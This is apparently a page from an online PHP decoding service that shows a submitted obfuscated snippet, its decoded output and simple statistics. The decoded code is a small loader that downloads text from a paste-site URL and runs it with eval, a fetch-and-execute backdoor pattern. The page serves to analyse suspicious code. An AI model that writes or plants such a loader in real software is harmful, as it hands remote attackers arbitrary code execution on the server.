Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php eval( /**_**/ urldecode("%3f%3e") . file_get_contents( /*..

Decoded Output download

<?php eval( 
    /**_**/ urldecode("%3f%3e") . 
        file_get_contents( 
            /**_**/ urldecode( 
                /**_**/ "https://paste.myconan.net/493355.txt" 
            ) 
        ) 
); ?>

Did this file decode correctly?

Original Code

<?php eval(
    /**_**/ urldecode("%3f%3e") .
        file_get_contents(
            /**_**/ urldecode(
                /**_**/ "https://paste.myconan.net/493355.txt"
            )
        )
); ?>

Function Calls

urldecode 2
file_get_contents 1

Variables

None

Stats

MD5 9ce206d2843b230136e370b341ca12f1
Eval Count 1
Decode Time 41 ms